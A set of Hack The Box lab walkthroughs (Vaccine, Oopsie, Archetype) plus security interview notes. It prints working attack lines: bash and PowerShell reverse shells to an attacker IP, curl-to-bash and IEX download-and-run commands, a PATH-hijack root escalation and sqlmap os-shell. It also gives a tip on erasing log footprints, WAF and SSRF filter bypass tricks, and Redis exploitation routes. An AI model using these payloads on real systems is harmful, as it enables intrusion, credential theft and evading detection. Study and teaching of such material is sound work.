HTB - Vaccine Walkthrough

Enumeration

nmap -p- --min-rate=1000 -T4 10.10.10.46 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt
nmap -sC -sV -p`cat ports.txt` 10.10.10.46

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
48866/tcp closed unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is open, so take a look at the site.

It is a login page (MegaCorp Login).

The credentials from the previous boxes don't work, and neither does a simple SQL injection on the login form.

FTP login

FTP is open; use the FileZilla credentials recovered from Oopsie (/root/.config/filezilla/filezilla.xml):

<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>

The FTP share contains backup.zip; unzipping it prompts for a password, so crack it with john.

Crack the zip file

zip2john backup.zip > hash

Crack it with the rockyou wordlist:

john hash --fork=4 -w=~/wordlist/rockyou.txt
john hash --show
backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Password found: 741852963

Unzip the archive and read index.php. The login compares the unsalted MD5 of the submitted password against a hard-coded digest:

if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {

An unsalted MD5 of a common password is trivial to look up: an online rainbow table such as CrackStation resolves 2cb42f8734ea607eefed3b70af13bbd3 to qwerty789.

Log in to the web app as admin / qwerty789.

The dashboard's search parameter is a potential SQL injection: a single quote in the search term goes straight into the query, and PostgreSQL reports the broken statement, which also reveals how the input is embedded (between '% and %' of an ilike pattern):

ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%Elixir' or 'a'='a%' ^
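Reproducing the injection offline, as an added example that is not part of the walkthrough: an in-memory SQLite table with a few constructed rows stands in for carsdb, SQLite's LIKE plays the role of ilike, and the query is built with the same '%term%' concatenation the error message reveals. Next to it is the bound-parameter version, which is the parameterized-query defence the interview notes further down list. Function names and sample rows are mine.

```python
"""Vaccine-style search injection: concatenated query vs. bound parameter."""
import sqlite3

# Constructed sample rows standing in for the carsdb "cars" table.
SAMPLE_CARS = [("Elixir", "Sports"), ("Sandy", "Sedan"), ("Meteor", "Hatchback")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table cars (name text, type text)")
    conn.executemany("insert into cars values (?, ?)", SAMPLE_CARS)
    return conn


def search_vulnerable(conn, term: str):
    # The user's term becomes part of the SQL text, exactly the pattern behind
    # "unterminated quoted string" above: a quote in the input breaks out of '%...%'.
    sql = "select name from cars where name like '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term: str):
    # Bound parameter: the whole pattern (quotes and all) is passed as data,
    # never parsed as SQL, so no input can change the query's structure.
    sql = "select name from cars where name like ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def probe(conn, term: str):
    """Return ('ok', rows) or ('error', message) for the vulnerable query.

    An 'error' on a lone quote is the same signal the PostgreSQL message gave."""
    try:
        return ("ok", search_vulnerable(conn, term))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    print(probe(conn, "'"))                       # syntax error: quote escaped the literal
    print(search_vulnerable(conn, "x' or 1=1 --"))  # comment eats the trailing %', every row returned
    print(search_safe(conn, "x' or 1=1 --"))        # no car is literally named that: []
```

Note that the single-quote probe raising an error is only the first sign; `' or 1=1 --` turning the search into a full table dump is what confirms the injection is exploitable, and the bound-parameter version returns nothing for the same input.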

Use sqlmap on the search parameter. The request only works with a valid session, so pass the session cookie (copy the current value from the browser):

PHPSESSID=rcmb87pnl11jpe70f1d99euamr

sqlmap -u 'http://10.10.10.46/dashboard.php?search=query' --cookie='PHPSESSID=rcmb87pnl11jpe70f1d99euamr' --os-shell

--os-shell yields command execution because the application connects to PostgreSQL as the postgres user (see the connection string in dashboard.php below).

The sqlmap os-shell is not interactive, so spawn a reverse shell from it and upgrade that to a tty.

On the attacker:

nc -nvlp 4444

In the os-shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.75/4444 0>&1'

In the reverse shell:

SHELL=/bin/bash script -q /dev/null

In /var/www/html/dashboard.php the application's database credentials are hard-coded:

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

The postgres user also has an SSH key pair in /var/lib/postgresql/.ssh. Copy the private key and log in with it (ssh refuses a key with loose permissions, hence the chmod):

chmod 600 id_rsa
ssh -i id_rsa postgres@10.10.10.46

An SSH session is the most stable shell you will get on the box.

Linux Privilege Escalation Awesome Script (linPEAS):
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

Serve it from the attacker and pipe it into bash on the target:

python3 -m http.server 8080
curl http://10.10.14.75:8080/linpeas.sh | bash

Relevant findings:

══════════╣ Finding 'username' string inside key folders (limit 70)
/var/www/html/index.php: if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
/var/www/html/index.php: <input id="login__username" type="text" name="username" class="form__input" placeholder="Username" required>


╔══════════╣ Finding passwords inside key folders (limit 70) - only PHP files
/var/www/html/dashboard.php: $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
/var/www/html/index.php: if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
/var/www/html/index.php: <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>

Check sudo -l, which lists the commands the current user may run through sudo.

A useful reference for abusing such binaries: https://gtfobins.github.io/gtfobins/

User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

vi can run a shell command with :!, and since vi itself runs as root under sudo, so does the shell it spawns:

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash

That gives a root shell.

Cleanup

The SSH logins and the web requests (including all the sqlmap traffic) are recorded in:

/var/log/auth.log
/var/log/apache2/access.log

Remove your footprints before leaving the lab box.


HTB - Oopsie Walkthrough

Enumeration

Quick scan for open ports:

nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt

detailed scan

nmap -sC -sV -p`cat ports.txt` 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 03:00 EDT
Nmap scan report for 10.10.10.28
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds

Port 80 is open; open it in a browser.

Try dirb:

dirb 10.10.10.28 -r -z 10

-r: do not recurse into directories; -z 10: add a 10 millisecond delay to each request

---- Scanning URL: http://10.10.10.28/ ----
==> DIRECTORY: http://10.10.10.28/css/
==> DIRECTORY: http://10.10.10.28/fonts/
==> DIRECTORY: http://10.10.10.28/images/
+ http://10.10.10.28/index.php (CODE:200|SIZE:10932)
==> DIRECTORY: http://10.10.10.28/js/
+ http://10.10.10.28/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.10.28/themes/
==> DIRECTORY: http://10.10.10.28/uploads/

-----------------
END_TIME: Mon Aug 9 04:10:08 2021
DOWNLOADED: 4612 - FOUND: 2

Try nikto:

nikto -h 10.10.10.28

Inspecting the page source reveals <script src="/cdn-cgi/login/script.js"></script>

Inspect the /cdn-cgi/login page: it is a login form.

SQL injection against it does not work. The credentials obtained on the first box (Archetype) do, with the common username admin; the boxes are related.

After logging in, the Upload tab says "This action require super admin rights."

http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1 reveals the account details for the given id, with no check that the id belongs to the logged-in user (an IDOR). Brute-force the id with Burp Suite.

Send the request to Intruder (Ctrl+I), open the Positions tab, clear the automatic selections, select the 1 in the URL and click Add.

Create the payload list:

for x in $(seq 1 100); do echo $x; done > ids.txt

Load it as the payload.

If necessary, in the Options tab set Follow redirections to Always and tick Process cookies in redirections.

Sort the results by response length; id 30 returns a different page:

86575	super admin	superadmin@megacorp.com

The application tracks the session with two cookies:

Cookie: user=34322; role=admin

Both are trusted client-side state, so change them to

user=86575; role=superadmin

and the upload page becomes accessible.
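The Intruder run and the cookie swap, scripted, as an added example that is not part of the original notes: fake_fetch is a constructed stand-in for admin.php (ids 1 and 30 carry the two records seen above, every other id renders an empty row), http_fetch shows what the real request looks like with the session cookies attached, and outliers() does the "sort by response length" step. Function names and the fake page markup are mine.

```python
"""Enumerate admin.php?content=accounts&id=N and flag ids whose page differs."""
from collections import Counter
import urllib.request

TARGET = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id={}"

# Constructed stand-in for the account page: the two records come from the
# notes above, everything else returns the same empty row.
FAKE_ACCOUNTS = {
    1: "34322\tadmin\tadmin@megacorp.com",
    30: "86575\tsuper admin\tsuperadmin@megacorp.com",
}


def fake_fetch(account_id: int) -> str:
    row = FAKE_ACCOUNTS.get(account_id, "")
    return f"<table><tr><td>{row}</td></tr></table>"


def http_fetch(account_id: int, cookie: str = "user=34322; role=admin") -> str:
    """The real request: same URL Intruder used, with the session cookies attached."""
    req = urllib.request.Request(TARGET.format(account_id), headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def response_lengths(fetch, ids):
    """{id: body length}: the column Intruder sorts on."""
    return {i: len(fetch(i)) for i in ids}


def outliers(lengths):
    """Ids whose length differs from the most common one (the empty-row baseline)."""
    baseline = Counter(lengths.values()).most_common(1)[0][0]
    return sorted(i for i, n in lengths.items() if n != baseline)


def forged_cookie(user_id: int, role: str = "superadmin") -> str:
    """The role lives in a client-side cookie, so rewriting it is the escalation."""
    return f"user={user_id}; role={role}"


if __name__ == "__main__":
    lengths = response_lengths(fake_fetch, range(1, 101))   # swap in http_fetch on a real target
    for i in outliers(lengths):
        print(i, lengths[i], fake_fetch(i))
    print(forged_cookie(86575))
```

On a real target pass http_fetch instead of fake_fetch; the baseline trick only works because most ids render the identical empty row, so check the flagged responses by eye rather than trusting the length alone.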

Now upload a PHP reverse shell. dirb found an /uploads/ directory, so the file should land at /uploads/php-shell1.php.

First start a listener on port 4444, then browse to the uploaded file:
nc -nvlp 4444

listening on [any] 4444 ...
connect to [10.10.14.75] from (UNKNOWN) [10.10.10.28] 57424
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
08:25:22 up 3:11, 1 user, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
robert pts/1 10.10.15.98 05:55 1:26m 0.06s 0.06s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

That gives a shell as www-data.

In /var/www/html/cdn-cgi/login there is db.php with the database credentials:
$ cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

https://www.php.net/manual/en/mysqli.construct.php

robert's database password is reused for his system account, so ssh robert@10.10.10.28 with M3g4C0rpUs3r! works:

uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

Check whether the bugtracker group grants access to anything special:

find / -type f -group bugtracker 2>/dev/null
/usr/bin/bugtracker

-type f: regular files only
2>/dev/null: discard the many permission-denied errors

Run it:
robert@oopsie:~$ /usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 123
---------------

cat: /root/reports/123: No such file or directory

bugtracker reads files under /root/reports/ by appending the supplied id to the path, and nothing stops a relative path. Entering ../root.txt as the Bug ID makes it read /root/reports/../root.txt, i.e. /root/root.txt.

That gets the flag.

The official guide gives another option: bugtracker is SUID root and runs cat through the shell, so cat executes with root privileges:

robert@oopsie:~$ ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker

Because it invokes cat by name rather than by absolute path, the lookup goes through PATH. Put a fake cat that starts a shell in front of the real one:

export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

Then run /usr/bin/bugtracker and answer the prompt with any id: the fake cat runs as root and we get a root shell. (Use /bin/cat or reset PATH afterwards, otherwise every later cat re-spawns the fake one.) Root's home holds the FileZilla config with the FTP credentials later used on Vaccine:

# cat filezilla.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
<RecentServers>
<Server>
<Host>10.10.10.46</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>
<Logontype>1</Logontype>
<TimezoneOffset>0</TimezoneOffset>
<PasvMode>MODE_DEFAULT</PasvMode>
<MaximumMultipleConnections>0</MaximumMultipleConnections>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>
# pwd
/root/.config/filezilla

HTB - Archetype Walkthrough

Enumeration

Scan for open ports:

nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt

grep ^[0-9]: keep only the port lines
cut -d '/' -f 1: keep the port number
tr: change each \n to ,
sed s/,$//: remove the trailing ,

More detailed scan of just those ports:

nmap -sC -sV -p`cat ports.txt` 10.10.10.27

Results:

135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp filtered unknown
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp closed unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Port 445: later versions of SMB (after Windows 2000) run directly over TCP on port 445 instead of over NetBIOS on 139; running on plain TCP is what lets SMB work across routed networks.

445 is open (SMB file sharing), so check for anonymous (null-session) access:

smbclient -N -L \\\\10.10.10.27 
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC

-N: do not ask for a password
-L: list shares

The backups share is readable anonymously; connect and download the config file:
smbclient -N \\\\10.10.10.27\\backups
smb: \> dir
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020

10328063 blocks of size 4096. 8248806 blocks available
smb: \> get prod.dtsConfig

A DTSCONFIG file is an XML configuration file used to apply property values to SQL Server Integration Services (SSIS) packages. It contains one or more package configurations made of metadata such as the server name, database names and other connection properties. This one carries a full connection string, including a username and password:
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>

Port 1433 is the default port for MS SQL Server. Connect with impacket's mssqlclient.py using Windows authentication (the sql_svc password M3g4c0rp123 is entered at the prompt):

mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

target format: [[domain/]username[:password]@]<targetName or address>

That drops us into the database. Check whether the current login has the sysadmin server role:
SQL> SELECT IS_SRVROLEMEMBER('sysadmin');


-----------

1

Change the configuration to make xp_cmdshell available (it is disabled by default and is an advanced option, so 'Show Advanced Options' must be enabled first; each change needs RECONFIGURE to take effect):
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver15

EXEC sp_configure 'Show Advanced Options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell "whoami"

xp_cmdshell:
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15

PowerShell reverse shell:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

reverseshell.ps1, first attempt (the PayloadsAllTheThings one-liner with a 'PS path> ' prompt):

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.73',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Second variant (ps_shell2.ps1: double-quoted host, plain '# ' prompt):

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.73",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Serve the script from a web server on the attacker:

python3 -m http.server 80

and listen for the reverse shell:

nc -vnlp 4242

In the SQL session, download and run it in memory:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.73/ps_shell2.ps1\");"

Not sure why the first script got blocked by the antivirus software.

The user flag is stored in C:\Users\sql_svc\Desktop\user.txt

Privilege escalation:

Look for frequently accessed files and commands. The PowerShell command history is worth reading:

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

https://en.wikipedia.org/wiki/Net_(command)

net use: connect/disconnect a computer to/from shared resources, or display information about the computer's connections. Here it was run with the administrator password on the command line, and the history file kept it.

Connect as the administrator and look at the desktop:

psexec.py administrator@10.10.10.27

cd C:\Users\administrator\Desktop

psexec needs port 445 open.

Prerequisites:

  • A modern Windows computer (local)
  • File and Printer Sharing open (remote computer, TCP port 445)
  • The admin$ administrative share available (remote computer)
  • You know a local account's credential (remote computer)

Security Interview Preparation

What vulnerability is in the following code?
import java.io.*;
import javax.servlet.http.*;
import java.nio.file.*;

public class ReadFile extends HttpServlet {
    protected void test(HttpServletRequest request, HttpServletResponse response) throws IOException {
        try {
            // "url" comes straight from the client and is used as a filesystem path
            String url = request.getParameter("url");
            String data = new String(Files.readAllBytes(Paths.get(url)));
        } catch (IOException e) {
            PrintWriter out = response.getWriter();
            out.print("File not found");
            out.flush();
        }
    }
}

Answer: the url parameter is passed straight to Paths.get()/Files.readAllBytes() without any validation, so a client can name any file the servlet process can read (arbitrary file read / path traversal, e.g. url=/etc/passwd or a ../ sequence). As written the content is not even sent back, but the "File not found" branch already turns the endpoint into a file-existence oracle. The fix is to resolve the requested name against a fixed base directory and reject anything that escapes it.
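The same bug and its fix, rendered in Python rather than Java so it lines up with the other examples on this page; this is an added example, not part of the original question. read_file_vulnerable mirrors Files.readAllBytes(Paths.get(url)); read_file_safe is the containment check. demo() builds a throwaway directory tree of its own (constructed, not from any real system) to show the difference.

```python
"""Arbitrary file read via an unvalidated path, and the base-directory containment fix."""
import os
import shutil
import tempfile


def read_file_vulnerable(path: str) -> bytes:
    # Equivalent of Files.readAllBytes(Paths.get(url)): whatever the client names is read.
    with open(path, "rb") as f:
        return f.read()


def read_file_safe(base_dir: str, user_path: str) -> bytes:
    base = os.path.realpath(base_dir)
    # realpath collapses ../ and follows symlinks, so the check sees the final target.
    target = os.path.realpath(os.path.join(base, user_path))
    # An absolute user_path replaces base in os.path.join, so this also catches "/etc/passwd".
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to read outside {base}: {user_path!r}")
    with open(target, "rb") as f:
        return f.read()


def demo():
    """Return (what the vulnerable reader leaks, what the safe reader allows, whether it blocks ../)."""
    root = tempfile.mkdtemp()
    try:
        docs = os.path.join(root, "docs")           # the directory the app is meant to serve
        os.makedirs(docs)
        with open(os.path.join(docs, "readme.txt"), "wb") as f:
            f.write(b"public")
        with open(os.path.join(root, "secret.txt"), "wb") as f:  # outside docs/
            f.write(b"SECRET")

        leaked = read_file_vulnerable(os.path.join(docs, "../secret.txt"))
        allowed = read_file_safe(docs, "readme.txt")
        try:
            read_file_safe(docs, "../secret.txt")
            blocked = False
        except PermissionError:
            blocked = True
        return leaked, allowed, blocked
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The check compares canonical paths rather than looking for "..", which is the version that survives URL-encoding tricks, symlinks and absolute paths; a substring check for ".." does not.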

Functions commonly used for error-based SQL injection (MySQL):

  • floor(): the rand()/floor()/group by duplicate-key trick
  • updatexml(): MySQL's XPath function for querying and modifying XML data, updatexml(xml_document, xpath_string, new_value); the XPath must be valid, so passing concat(0x7e, database()) (0x7e is ~, which makes the XPath invalid) gets the evaluated value echoed back in the error message
  • extractvalue(): similar to updatexml(), also takes an XPath argument
  • exp(): raises an error when its argument exceeds roughly 709 (double overflow); ~0 is always larger than that, and a subquery usually returns 0, so exp(~(select version())) errors out and the error message sometimes contains the evaluated version()

Which of the following operations requires root on Linux:

  • iptables -t nat -L (yes: reading the netfilter tables needs CAP_NET_ADMIN)
  • nc -l -p 1024 (no: it listens on port 1024, which is not a privileged port; only ports below 1024 need CAP_NET_BIND_SERVICE)

Which of the following are buffer-overflow protections?

  • PIE (-fPIE, position-independent executable), which lets ASLR randomise the executable's own base address
  • NX, non-executable pages
  • Stack canary

Not one: SE (secure element)

PHP variable overwrite: which PHP functions lead to variable overwrite when misused (summary of PHP variable-overwrite vulnerabilities):

  • extract(), parse_str(), import_request_variables()

Ways to exploit an unauthenticated Redis instance (CONFIG SET dir/dbfilename plus SAVE write the database file wherever the redis user may write):

  • write an SSH public key into authorized_keys
  • write a webshell into the web root
  • write a scheduled task into crontab

APK v1 signing: the v1 (JAR) signature only verifies individual ZIP entries, not the archive as a whole.

What the Secure attribute on a cookie means:

  • Secure prevents the cookie from being captured in transit: when set, the browser only sends the stored cookie over HTTPS, and a plain HTTP request to the same site does not carry it.
  • HttpOnly keeps scripts from reading the cookie: when set, JavaScript cannot access it through document.cookie, which limits what a successful XSS can steal (it does not prevent the XSS itself).

CC attack: Challenge Collapsar attack, a form of DDoS that floods resource-heavy dynamic pages with seemingly legitimate HTTP requests.

Web Application Firewall
Summary of WAF mechanisms and bypass methods:

  • encoding (URL, Unicode, hex)
  • changing letter case
  • whitespace filtering bypass (other whitespace characters or +)
  • doubled keywords (e.g. SELSELECTECT when the WAF strips the keyword once)
  • inline comments (/*! ... */)
  • lax rules for a different request method (e.g. POST instead of GET)
  • unusual HTTP methods (DigAPi), similar to the above
  • oversized request bodies
  • parameter pollution (repeated parameters)
  • inserting % to defeat filters
  • protocols the WAF does not cover
  • wide-byte (multibyte) bypass
  • %00 truncation
  • ... and so on

Which of the following tools can intercept and modify packets:

  • Burp Suite
  • Fiddler

Defending against CSRF:

  • validate the Referer header
  • add a token to requests
  • CAPTCHA

SSRF: Server-Side Request Forgery (https://websec.readthedocs.io/zh/latest/vuln/ssrf.html)
The dangerous functions for SSRF are the ones that perform network access, including reads through pseudo-protocols. In PHP these include file_get_contents(), fsockopen(), curl_exec() and others.

Some developers filter internal IPs by regex-matching the URL parameter. Bypass such filters by rewriting the IP: inet_aton-style parsers accept octal, hexadecimal and decimal fields and let the trailing fields be merged into one number, so 192.168.0.1 can also be written as:

  • octal fields: 0300.0250.0.1
  • hexadecimal fields: 0xC0.0xA8.0.1
  • decimal integer: 3232235521
  • hexadecimal integer: 0xC0A80001
  • last two octets merged: 192.168.1
  • last three octets merged: 192.11010049
  • the merged fields may them­selves be octal or hex, e.g. 192.0xA80001
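Because Python's ipaddress module rejects every one of those spellings, a filter built on it would also reject them, while a URL library or libc's inet_aton accepts them; the example below, added here and not part of the original notes, implements the inet_aton parsing rules so a filter can canonicalise first and then decide, and produces the alternate spellings for a given address. It also generalises the bullet list to any IPv4 address. Function names are mine.

```python
"""inet_aton-style IPv4 parsing (octal/hex/decimal, merged trailing fields) for SSRF filters."""
import ipaddress


def _parse_field(s: str) -> int:
    s = s.lower()
    if s.startswith("0x"):            # hexadecimal field, e.g. 0xC0
        return int(s[2:], 16) if len(s) > 2 else 0
    if len(s) > 1 and s[0] == "0":    # leading zero means octal, e.g. 0300
        return int(s, 8)
    return int(s, 10)


def inet_aton_int(text: str) -> int:
    """BSD/glibc inet_aton rules: 1 to 4 dotted fields; the last field fills the remaining bytes."""
    fields = [_parse_field(p) for p in text.split(".")]
    if not 1 <= len(fields) <= 4:
        raise ValueError(text)
    *head, tail = fields
    for p in head:
        if not 0 <= p <= 255:
            raise ValueError(text)
    tail_bits = 8 * (4 - len(head))
    if not 0 <= tail < (1 << tail_bits):
        raise ValueError(text)
    value = 0
    for p in head:
        value = (value << 8) | p
    return (value << tail_bits) | tail


def canonical(text: str) -> str:
    """Dotted-quad form of any inet_aton spelling."""
    return str(ipaddress.IPv4Address(inet_aton_int(text)))


def is_internal(text: str) -> bool:
    """What an SSRF filter should ask, after canonicalising rather than regex-matching the raw text."""
    a = ipaddress.IPv4Address(inet_aton_int(text))
    return a.is_private or a.is_loopback or a.is_link_local or a.is_reserved or a.is_unspecified


def variants(dotted: str) -> dict:
    """The bypass spellings of a dotted-quad address, generalising the list above."""
    o = [int(x) for x in dotted.split(".")]
    n = inet_aton_int(dotted)
    return {
        "octal": ".".join(f"0{x:o}" for x in o),
        "hex": ".".join(f"0x{x:X}" for x in o),
        "decimal": str(n),
        "hex_int": f"0x{n:08X}",
        "three_parts": f"{o[0]}.{o[1]}.{(o[2] << 8) | o[3]}",
        "two_parts": f"{o[0]}.{(o[1] << 16) | (o[2] << 8) | o[3]}",
    }


if __name__ == "__main__":
    for name, form in variants("192.168.0.1").items():
        print(f"{name:12} {form:18} -> {canonical(form)}  internal={is_internal(form)}")
```

A filter that only ever sees the canonical form cannot be fooled by the spelling; the remaining SSRF bypasses (DNS names resolving to internal addresses, redirects, IPv6 forms) are a separate problem this parser does not address.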

The four necessary conditions for deadlock:

  • Mutual exclusion: a resource can be held by only one process at a time.
  • Hold and wait: a process that blocks waiting for a resource keeps the resources it already holds.
  • No preemption: a resource already granted to a process cannot be forcibly taken away before the process is done with it.
  • Circular wait: a set of processes form a head-to-tail cycle, each waiting for a resource held by the next.

These four are necessary conditions: whenever a deadlock occurs all of them hold, and if any one of them is not satisfied, deadlock cannot occur.

DSA vs RSA

DOM-based XSS (brief analysis): the payload is handled entirely client-side and never interacts with the backend

Parameterized queries prevent SQL injection, e.g.

INSERT INTO myTable (c1, c2, c3, c4) VALUES (@c1, @c2, @c3, @c4)
UPDATE myTable SET c1 = ?, c2 = ?, c3 = ? WHERE c4 = ?

The 20 log files under /var/log explained (note title)

hydra is a brute-forcing tool

The mathematician John von Neumann proposed three basic principles for building computers: binary logic, stored-program execution, and a machine made of five parts (arithmetic unit, control unit, memory, input devices, output devices). This is known as the von Neumann architecture.

Privilege abuse: horizontal and vertical privilege escalation, i.e. Broken Access Control (BAC)

Which command shows the SELinux status on Linux:
getenforce

pr - convert text files for printing (not related to SELinux)

Usual Linux: DAC (Discretionary Access Control)

  • users may change the access control lists on objects they own

SELinux: MAC (Mandatory Access Control)

  • the system (administrator) defines the access control policy and users cannot change it

SELinux primer (note title)

XSS defence:
htmlspecialchars() converts the input into HTML entities.

RCE: Remote Code Execution


OSCP Exam Tips

During the exam

